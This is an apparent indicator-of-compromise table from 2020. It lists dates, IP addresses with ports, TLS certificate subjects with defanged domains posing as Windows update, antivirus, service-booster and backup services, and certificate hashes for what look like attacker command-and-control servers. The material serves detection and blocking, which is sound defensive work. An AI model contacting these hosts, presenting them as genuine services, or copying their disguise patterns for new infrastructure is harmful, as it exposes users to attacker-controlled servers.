e1dc7cecd3cb225b131bdb71df4b3079

1/30/20

149.28.122.130:443

CN=renovatesystem[.]com

734c26d93201cf0c918135915fdf96af

1/30/20

45.32.170.9:80

CN=livecheckpointsrs[.]com

1de9e9aa8363751c8a71c43255557a97

1/30/20

149.248.58.11:80

CN=updatewinlsass[.]com

8c581979bd11138ffa3a25b895b97cc0

1/30/20

149.28.122.130:80

CN=renovatesystem[.]com

734c26d93201cf0c918135915fdf96af

1/30/20

207.148.8.61:80

CN=ciscocheckapi[.]com

97ca76ee9f02cfda2e8e9729f69bc208

1/31/20

81.17.25.210:443

CN=update-wind[.]com

877bf6c685b68e6ddf23a4db3789fcaa

1/31/20

31.7.59.141:80

CN=updatewinsoftr[.]com

07f9f766163c344b0522e4e917035fe1

2/2/20

155.138.214.247:80

CN=cleardefencewin[.]com

61df4864dc2970de6dcee65827cc9a54

2/2/20

155.138.214.247:443

CN=cleardefencewin[.]com

61df4864dc2970de6dcee65827cc9a54

2/2/20

45.76.231.195:443

CN=checkwinupdate[.]com

d8e5dddeec1a9b366759c7ef624d3b8c

2/2/20

45.76.231.195:80

CN=checkwinupdate[.]com

d8e5dddeec1a9b366759c7ef624d3b8c

2/3/20

46.19.142.154:443

CN=havesetup[.]net

cd354c309f3229aff59751e329d8243a

2/3/20

95.179.219.169:80

CN=jomamba[.]best

80b7001e5a6e4bd6ec79515769b91c8b

2/3/20

140.82.60.155:80

CN=updatemanagir[.]us

ec16be328c09473d5e5c07310583d85a

2/3/20

209.222.108.106:80

CN=timesshifts[.]com

2bb464585f42180bddccb50c4a4208a5

2/3/20

66.42.118.123:443

CN=conhostservice[.]com

6c21d3c5f6e8601e92ae167a7cff721c

2/4/20

80.240.18.106:443

CN=microsoftupdateswin[.]com

27cae092ad6fca89cd1b05ef1bb73e62

2/4/20

95.179.215.228:443

CN=iexploreservice[.]com

26010bebe046b3a33bacd805c2617610

2/12/20

155.138.216.133:443

CN=defenswin[.]com

e5005ae0771fcc165772a154b7937e89

2/12/20

45.32.130.5:443

CN=avrenew[.]com

f32ee1bb35102e5d98af81946726ec1b

2/14/20

45.76.167.35:443

CN=freeallsafe[.]com

85f743a071a1d0b74d8e8322fecf832b

2/14/20

45.63.95.187:443

CN=easytus[.]com

17de38c58e04242ee56a9f3a94e6fd53

2/17/20

45.77.89.31:443

CN=besttus[.]com

2bda8217bdb05642c995401af3b5c1f3

2/17/20

95.179.147.215:443

CN=windefens[.]com

57725c8db6b98a3361e0d905a697f9f8

2/17/20

155.138.216.133:443

CN=defenswin[.]com

c07774a256fc19036f5c8c60ba418cbf

2/17/20

104.238.190.126:443

CN=aaatus[.]com

4039af00ce7a5287a3e564918edb77cf

2/17/20

144.202.83.4:443

CN=greattus[.]com

7f0fa9a608090634b42f5f17b8cecff0

2/17/20

104.156.245.0:443

CN=comssite[.]com

f5bb98fafe428be6a8765e98683ab115

2/17/20

45.32.30.162:443

CN=bigtus[.]com

698fc23ae111381183d0b92fe343b28b

2/17/20

108.61.242.184:443

CN=livetus[.]com

8bedba70f882c45f968c2d99b00a708a

2/17/20

207.148.15.31:443

CN=findtus[.]com

15f07ca2f533f0954bbbc8d4c64f3262

2/17/20

149.28.15.247:443

CN=firsttus[.]com

88e8551f4364fc647dbf00796536a4c7

2/21/20

155.138.136.182:443

CN=worldtus[.]com

b31f38b2ccbbebf4018fe5665173a409

2/25/20

45.77.58.172:443

CN=freeoldsafe[.]com

a46e77b92e1cdfec82239ff54f2c1115

2/25/20

45.77.58.172:443

CN=freeoldsafe[.]com

a46e77b92e1cdfec82239ff54f2c1115

2/26/20

108.61.72.29:443

CN=myserviceconnect[.]net

9f551008f6dcaf8e6fe363caa11a1aed

2/27/20

216.155.157.249:443

CN=myserviceupdater[.]com

4c6a2c06f1e1d15d6be8c81172d1c50c

2/28/20

45.77.98.157:443

CN=topservicesbooster[.]com

ba4b34962390893852e5cc7fa7c75ba2

2/28/20

104.156.250.132:443

CN=myservicebooster[.]com

89be5670d19608b2c8e261f6301620e1

2/28/20

149.28.50.31:443

CN=topsecurityservice[.]net

77e2878842ab26beaa3ff24a5b64f09b

2/28/20

149.28.55.197:443

CN=myyserviceupdater[.]com

0dd8fde668ff8a301390eef1ad2f9b83

2/28/20

207.246.67.70:443

CN=servicesecurity[.]org

c88098f9a92d7256425f782440971497

2/28/20

63.209.33.131:443

CN=serviceupdates[.]net

16e86a9be2bdf0ddc896bc48fcdbb632

2/29/20

45.77.206.105:443

CN=myservicebooster[.]net

6e09bb541b29be7b89427f9227c30a32

2/29/20

140.82.5.67:443

CN=servicesbooster[.]org

42d2d09d08f60782dc4cded98d7984ed

2/29/20

108.61.209.123:443

CN=brainschampions[.]com

241ab042cdcb29df0a5c4f853f23dd31

2/29/20

104.156.227.250:443

CN=servicesbooster[.]com

f45f9296ff2a6489a4f39cd79c7f5169

2/29/20

140.82.10.222:443

CN=topservicesecurity[.]net

b9375e7df4ee0f83d7abb179039dc2c5

2/29/20

149.28.35.35:443

CN=topservicesecurity[.]org

82bd8a2b743c7cc3f3820e386368951d

2/29/20

207.148.21.17:443

CN=topserviceupdater[.]com

ece184f8a1309b781f912d4f4d65738e

2/29/20

45.77.153.72:443

CN=topservicesupdate[.]com

8330c3fa8ca31a76dc8d7818fd378794

3/1/20

140.82.10.222:80

CN=topservicesecurity[.]net

b9375e7df4ee0f83d7abb179039dc2c5

3/1/20

207.148.21.17:80

CN=topserviceupdater[.]com

ece184f8a1309b781f912d4f4d65738e

3/1/20

108.61.90.90:443

CN=topservicesecurity[.]com

696aeb86d085e4f6032e0a01c496d26c

3/1/20

45.32.130.5:80

CN=avrenew[.]com

f32ee1bb35102e5d98af81946726ec1b

3/2/20

217.69.15.175:443

CN=serviceshelpers[.]com

9a437489c9b2c19c304d980c17d2e0e9

3/2/20

155.138.135.182:443

CN=topservicesupdates[.]com

b9deff0804244b52b14576eac260fd9f

3/2/20

95.179.210.8:80

CN=serviceuphelper[.]com

bb65efcead5b979baee5a25756e005d8

3/2/20

45.76.45.162:443

CN=boostsecuritys[.]com

7d316c63bdc4e981344e84a017ae0212

3/4/20

108.61.176.237:443

CN=yoursuperservice[.]com

7424aaede2f35259cf040f3e70d707be

3/4/20

207.246.67.70:443

CN=servicesecurity[.]org

d66cb5528d2610b39bc3cecc20198970

3/6/20

188.166.52.176:443

CN=top-servicebooster[.]com

f882c11b294a94494f75ded47f6f0ca0

3/7/20

149.248.56.113:443

CN=topservicehelper[.]com

2a29e359126ec5b746b1cc52354b4adf

3/8/20

199.247.13.144:443

CN=hakunamatatata[.]com

e2cd3c7e2900e2764da64a719096c0cb

3/8/20

95.179.210.8:443

CN=serviceuphelper[.]com

bb65efcead5b979baee5a25756e005d8

3/8/20

207.246.67.70:443

CN=servicesecurity[.]org

d89f6bdc59ed5a1ab3c1ecb53c6e571c

3/9/20

194.26.29.230:443

CN=secondserviceupdater[.]com

c30a4809c9a77cfc09314a63f7055bf7

3/9/20

194.26.29.229:443

CN=firstserviceupdater[.]com

bc86a3087f238014b6c3a09c2dc3df42

3/9/20

194.26.29.232:443

CN=fourthserviceupdater[.]com

3dc6d12c56cc79b0e3e8cd7b8a9c320b

3/9/20

194.26.29.234:443

CN=sixthserviceupdater[.]com

951e29ee8152c1e7f63e8ccb6b7031c1

3/9/20

194.26.29.235:443

CN=seventhserviceupdater[.]com

abe1ce0f83459a7fe9c72839fc46330b

3/9/20

194.26.29.236:443

CN=eighthserviceupdater[.]com

c7a539cffdd230a4ac9a4754c2c68f12

3/9/20

194.26.29.237:443

CN=ninethserviceupdater[.]com

1d1f7bf2c0eec7a3a0221fd473ddbafc

3/9/20

194.26.29.225:443

CN=seventeenthservicehelper[.]com

6b1e0621f4d891b8575a229384d0732d

3/9/20

194.26.29.227:443

CN=nineteenthservicehelper[.]com

38756ffb8f2962f6071e770637a2d962

3/9/20

194.26.29.242:443

CN=thirdservicehelper[.]com

3b911032d08ff4cb156c064bc272d935

3/9/20

194.26.29.244:443

CN=tenthservicehelper[.]com

a2d9b382fe32b0139197258e3e2925c4

3/9/20

194.26.29.226:443

CN=eighteenthservicehelper[.]com

4acbca8efccafd92da9006d0cc91b264

3/9/20

194.26.29.243:443

CN=ninthservicehelper[.]com

0760ab4a6ed9a124aabb8c377beead54

3/9/20

194.26.29.201:443

CN=secondservicehelper[.]com

d8a8d0ad9226e3c968c58b5d2324d899

3/9/20

194.26.29.202:443

CN=thirdservicehelper[.]com

0d3b79158ceee5b6ce859bb3fc501b02

3/9/20

194.26.29.220:443

CN=fourservicehelper[.]com

831e0445ea580091275b7020f2153b08

3/11/20

207.246.67.70:80

CN=servicesecurity[.]org

d89f6bdc59ed5a1ab3c1ecb53c6e571c

3/13/20

165.227.196.0:443

CN=twentiethservicehelper[.]com

977b4abc6307a9b3732229d4d8e2c277

3/14/20

45.141.86.91:443

CN=thirdservice-developer[.]com

edc2680e3797e11e93573e523bae7265

3/14/20

194.26.29.219:443

CN=firstservisehelper[.]com

6b444a2cd3e12d4c3feadec43a30c4d6

3/14/20

45.141.86.93:443

CN=fifthservice-developer[.]com

60e7500c809f12fe6be5681bd41a0eda

3/15/20

45.141.86.90:443

CN=secondservice-developer[.]com

de9460bd6b1badb7d8314a381d143906

3/15/20

45.141.86.84:443

CN=firstservice-developer[.]com

6385acd425e68e1d3fce3803f8ae06be

3/17/20

45.141.86.96:443

CN=eithtservice-developer[.]com

e1d1fb4a6f09fb54e09fb27167028303

3/17/20

45.141.86.92:443

CN=fourthservice-developer[.]com

5b5375bf30aedfa3a44d758fe42fccba

3/18/20

45.141.86.94:443

CN=sixthservice-developer[.]com

4d42bea1bfc7f1499e469e85cf75912c

3/18/20

108.61.209.121:443

CN=service-booster[.]com

692ed54fb1fb189c36d2f1674db47e45

3/18/20

134.122.116.114:443

CN=service-helpes[.]com

ad0914f72f1716d810e7bd8a67c12a71

3/18/20

209.97.130.197:443

CN=helpforyourservice[.]com

00fe3cc532f876c7505ddbf5625de404

3/18/20

192.241.143.121:443

CN=serviceshelps[.]com

e50998208071b4e5a70110b141542747

3/18/20

45.141.86.95:443

CN=seventhservice-developer[.]com

413ca4fa49c3eb6eef0a6cbc8cac2a71

3/18/20

198.211.116.199:443

CN=actionshunter[.]com

8e5bedbe832d374b565857cce294f061

3/18/20

45.141.86.155:443

CN=sexyservicee[.]com

cca37e58b23de9a1db9c3863fe2cd57c

3/19/20

194.26.29.239:443

CN=eleventhserviceupdater[.]com

7e0fcb78055f0eb12bc8417a6933068d

3/19/20

45.141.86.206:443

CN=servicedhunter[.]com

fdefb427dcf3f0257ddc53409ff71d22

3/19/20

45.141.86.92:443

CN=service-updateer[.]com

51ba9c03eac37751fe06b7539964e3de

3/19/20

134.122.116.59:443

CN=servicedbooster[.]com

db7797a20a5a491fb7ad0d4c84acd7e8

3/19/20

134.122.118.46:443

CN=servicedpower[.]com

7b57879bded28d0447eea28bacc79fb5

3/19/20

134.122.124.26:443

CN=serviceboostnumberone[.]com

880982d4781a1917649ce0bb6b0d9522

3/20/20

45.141.86.97:443

CN=ninethservice-developer[.]com

e4a720edfcc7467741c582cb039f20e0

3/20/20

178.62.247.205:443

CN=top-serviceupdater[.]com

a45522bd0a26e07ed18787c739179ccb

3/20/20

159.203.36.61:443

CN=yourserviceupdater[.]com

7b422c90dc85ce261c0a69ba70d8f6b5

3/20/20

134.122.20.117:443

CN=fifthserviceupdater[.]com

99aa16d7fc34cdcc7dfceab46e990f44

3/23/20

165.22.125.178:443

CN=servicemonsterr[.]com

82abfd5b55e14441997d47aee4201f6d

3/24/20

69.55.60.140:443

CN=boostyourservice[.]com

7f3787bf42f11da321461e6db7f295d1

3/24/20

45.141.86.98:443

CN=tenthservice-developer[.]com

eef29bcbcba1ce089a50aefbbb909203

3/26/20

178.79.132.82:443

CN=developmasters[.]com

5cf480eba910a625e5e52e879ac5aecb

3/26/20

194.26.29.247:443

CN=thirteenthservicehelper[.]com

2486df3869c16c0d9c23a83cd61620c2

5/4/20

159.65.216.127:443

CN=info-develop[.]com

5f7a5fb72c6689934cc5d9c9a681506b

9/22/20

69.61.38.155:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com

d37ba4a4b1885e96ff54d1f139bf3f47

9/22/20

96.9.225.144:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hakunaman[.]com

4408ba9d63917446b31a0330c613843d

9/22/20

96.9.209.216:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=caonimas[.]com

d921dd1ba03aaf37d5011020577e8147

9/22/20

107.173.58.176:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=chalengges[.]com

dfeb6959b62aff0b93ca20fd40ef01a8

9/22/20

96.9.225.143:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=reginds[.]com

05c03b62dea6ec06006e57fd0a6ba22e

9/22/20

69.61.38.156:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=errvghu[.]com

c14a892f8203a04c7e3298edfc59363a

9/22/20

45.34.6.229:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=harddagger[.]com

7ed16732ec21fb3ec16dbb8df0aa2250

9/22/20

45.34.6.226:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=getinformationss[.]com

1788068aff203fa9c51d85bf32048b9c

9/22/20

45.34.6.225:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gameleaderr[.]com

0fff2f721ad23648175d081672e77df4

9/22/20

107.173.58.185:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=razorses[.]com

b960355ba112136f93798bf85e6392bf

9/22/20

107.173.58.183:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nomadfunclub[.]com

a3d4e6d1f361d9c335effdbd33d12e79

9/22/20

107.173.58.175:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bouths[.]com

e13fbdff954f652f14faf11b735c0ef8

9/22/20

185.184.223.194:443

C=US,ST=CA,L=Texas,O=lol,OU=,CN=regbed[.]com

67310b30bada4f77f8f336438890d8f2

9/22/20

109.70.236.134:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=vnuret[.]com

ae74cbb9838688363b7928b06963c40a

9/23/20

64.44.131.103:443

C=US,ST=TX,L=Texas,O=serviceswork,OU=,CN=serviceswork[.]net

af518cc031807f43d646dc508685bcd3

9/23/20

69.61.38.157:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=moonshardd[.]com

c8fd81d6d3c8cbb8256c470a613a7c7b

9/23/20

193.142.58.129:443

C=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com

5a22c3c8a0ed6482cad0e2b867c4c10c

9/23/20

45.34.6.223:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com

bf598ba46f47919c264514f10ce80e34

9/23/20

107.173.58.179:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com

1c8243e2787421373efcf98fc0975031

9/23/20

45.34.6.222:443

C=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com

576d65a68900b270155c2015ac4788bb

9/23/20

107.173.58.180:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com

69643e9b1528efc6ec9037b60498b94c

9/23/20

107.173.58.182:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com

ca9b7e2fcfd35f19917184ad2f5e1ad3

9/23/20

45.34.6.221:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com

e5e0f017b00af6f020a28b101a136bad

9/24/20

213.252.244.62:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com

8367a1407ae999644f25f665320a3899

9/24/20

185.25.50.167:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com

34a78f1233e53010d29f2a4fa944c877

9/30/20

88.119.171.75:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com

eaebbe5a3e3ea1d5992a4dfd4af7a749

10/1/20

88.119.171.74:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com

adc8cd1285b7ae62045479ed39aa37f5

10/1/20

88.119.171.55:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com

bfe1fd16cd4169076f3fbaab5afcbe12

10/1/20

88.119.171.67:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com

c8a623eb355d172fc3e083763934a7f7

10/1/20

88.119.171.76:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com

0ac5659596008e64d4d0d90dfb6abe7c

10/1/20

88.119.171.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com

48003b6b638dc7e79e75a581c58f2d77

10/1/20

88.119.171.69:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com

5c75a6bbb7454a04b9ea26aa80dfbcba

10/1/20

88.119.171.73:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com

e391c997b757424d8b2399cba4733a60

10/1/20

88.119.171.77:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com

035697cac0ee92bb4d743470206bfe9a

10/1/20

88.119.171.78:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com

fc133bed713608f78f9f112ed7498f32

10/1/20

213.252.244.38:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com

8ead6021e2a5b9191577c115d4e68911

10/1/20

107.173.58.184:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com

1c9949d20441df2df09d13778b751b65

10/1/20

88.119.174.109:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com

c0ddfc954aa007885b467f8c4f70ad75

10/1/20

88.119.174.110:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com

ee63098506cb82fc71a4e85043d4763f

10/1/20

88.119.174.114:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com

422b020be24b346da826172e4a2cf1c1

10/1/20

88.119.174.116:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com

8d8f046e963bcd008fe4bbed01bed4c8

10/1/20

88.119.174.117:443

C=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com

c381fb63e9cb6b0fc59dfaf6e8c40af3

10/1/20

88.119.174.118:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com

add6b742d0f992d56bede79888eef413

10/1/20

88.119.174.119:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com

9bbd073033e34bfd80f658f0264f6fae

10/1/20

88.119.174.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com

9afef617897e7089f59c19096b8436c8

10/1/20

88.119.174.120:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com

3f366e5f804515ff982c151a84f6a562

10/1/20

88.119.174.107:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com

c2f99054e0b42363be915237cb4c950b

10/1/20

88.119.174.125:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com

4ac8ac12f1763277e35da08d8b9ea394

10/1/20

88.119.174.126:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com

7080547306dceb90d809cb9866ed033c

10/1/20

88.119.174.127:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com

03037dff61500d52a37efd4b4f520518

10/1/20

88.119.174.128:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com

959bed7a2662d7274b303f3b120fddea

10/1/20

213.252.244.126:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com

1d28556cc80df9627c20316358b625d6

10/1/20

213.252.244.170:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com

85e65803443046f921b9a0a9b8cc277c

10/1/20

213.252.246.154:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com

9df6ba82461aa0594ead03993c0e4c42

10/5/20

5.2.64.113:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com

18aadee1b82482c3cd5ebe32f3628f3f

10/7/20

5.2.79.122:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com

94bc44bd438d2e290516d111782badde

10/7/20

88.119.171.94:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com

f0ede92cb0899a9810a67d716cdbebe2

10/7/20

5.2.64.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com

e0f9efedd11d22a5a08ffb9c4c2cbb5a

10/7/20

5.2.64.135:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com

4aa2acabeb3ff38e39ed1d840124f108

10/7/20

5.2.72.202:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com

c04034b78012cca7dcc4a0fb5d7bb551

10/7/20

88.119.175.153:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com

2670bf08c43d995c74b4b83383af6a69

10/7/20

213.252.245.71:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com

127cc347b711610c3bcee434eb8bf822

10/7/20

213.252.246.144:443

C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com

b3e7ab478ffb0213017d57a88e7b2e3b

10/7/20

5.2.64.149:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com

188f603570e7fa81b92906af7af177dc

10/7/20

5.2.64.144:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com

22d7f35e624b7bcee7bb78ee85a7945c

10/7/20

88.119.174.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com

12c6e173fa3cc11cc6b09b01c5f71b0c

10/7/20

88.119.174.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com

28435684c76eb5f1c4b48b6bbc4b22af

10/7/20

88.119.175.214:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com

9c2d64cf4e8e58ef86d16e9f77873327

10/7/20

5.2.72.200:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com

f6f484baf1331abf55d06720de827190

10/7/20

5.2.79.10:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com

d8eacda158594331aec3ad5e42656e35

10/7/20

5.2.79.12:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com

29032dd12ea17fc37ffff1ee94cc5ba8

10/7/20

5.2.79.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com

eaf32b1c2e31e4e7b6d5c3e6ed6bff3d

10/7/20

5.2.64.174:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com

442680006c191692fcc3df64ec60d8fa

10/7/20

5.2.64.172:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com

0593cbf6b3a3736a17cd64170e02a78d

10/7/20

5.2.64.167:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com

38df81824bd8cded4a8fa7ad9e4d1f67

10/7/20

5.2.64.182:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com

99dbe71ca7b9d4a1d9f722c733b3f405

10/7/20

88.119.171.97:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com

7d7199ffa40c50b6e5b025b8cb2661b2

10/7/20

88.119.171.96:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com

f433d25a0dad0def0510cd9f95886fdb

10/7/20

96.9.209.217:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com

e84c7aa593233250efac903c19f3f589

10/7/20

69.61.38.132:443

C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com

e6e80f6eb5cbfc73cde40819007dcc53

10/13/20

45.147.230.131:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com

4fdeab3dad077589d52684d35a9ea4ab

10/13/20

45.147.229.92:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com

b70cdb49b26e6e9ba7d0c42d5f3ed3cb

10/13/20

45.147.229.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com

57024c1fe5c4acaf30434ba1f58f9144

10/13/20

45.147.229.52:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com

ec5496048f1962494d239d377e53db0c

10/13/20

45.147.229.44:443

C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com

938593ac1c8bdb2c5256540d7c8476c8

10/14/20

45.147.230.87:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com

cced46e0a9b6c382a97607beb95f68ab

10/14/20

45.147.230.159:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

e912980fc8e9ec1e570e209ebb163f65

10/14/20

45.147.230.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

39d7160ce331a157d3ecb2a9f8a66f12

10/14/20

45.147.230.140:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

d9ca73fe10d52eef6952325d102f0138

10/14/20

45.147.230.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

920d04330a165882c8076c07b00e1d93

10/14/20

45.147.230.132:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

771463611a43ee35a0ce0631ef244dee

10/14/20

45.147.229.180:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com

1e4a794da7d3c6d0677f7169fbe3b526

10/14/20

45.147.230.159:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

9c7fe10135f6ad96ded28fac51b79dfd

10/15/20

45.147.230.132:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

a78c0e2920e421667ae734d923dd5ca6

10/15/20

45.138.172.95:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com

a0b2378ceae498f46401aadeb278fb31

10/16/20

108.62.12.119:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com

e95bb7804e3add830496bd36664ed339

10/16/20

108.62.12.105:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com

8d5dc95b3bd4d16a3434b991a09bf77e

10/16/20

108.62.12.114:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com

d5de2f5d2ca29da1724735cdb8fbc63f

10/16/20

108.62.12.116:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com

9c7396ecd107ee8f8bf5521afabb0084

10/16/20

45.147.230.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

1134a6f276f4297a083fc2a605e24f70

10/16/20

45.147.230.140:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

2150045f476508f89d9a322561b28ff9

10/16/20

45.147.230.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

f4ddc4562e5001ac8fdf0b7de079b344

10/19/20

74.118.138.137:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com

75fb6789ec03961c869b52336fa4e085

10/19/20

74.118.138.115:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com

9f5e845091015b533b59fe5e8536a435

10/19/20

108.177.235.53:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com

4b78eaa4f2748df27ebf6655ea8a7fe9

10/19/20

74.118.138.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com

bcccda483753c82e62482c55bc743c16

10/21/20

45.153.241.1:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com

672c66dd4bb62047bb836bd89d2e1a65

10/21/20

45.153.240.240:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com

6825409698a326cc319ca40cd85a602e

10/21/20

45.153.240.194:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

7f9be0302da88e0d322e5701d52d4128

10/21/20

45.153.240.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

2c6a0856d1a75b303337ac0807429e88

10/21/20

45.153.240.136:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

6559dbf8c47383b7b493500d7ed76f6a

10/23/20

45.153.240.157:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

7bd044e0a6689ef29ce23e3ccb0736a3

10/23/20 | 45.153.240.178:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com | 9859a8336d097bc30e6e5c7a8279f18e
10/23/20 | 45.153.240.220:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com | 43fb2c153b59bf46cf6f67e0ddd6ef51
10/23/20 | 45.153.240.222:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com | 22bafb30cc3adaa84fef747d589ab235
10/23/20 | 45.153.241.134:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com | 31e87ba0c90bb38b986af297e4905e00
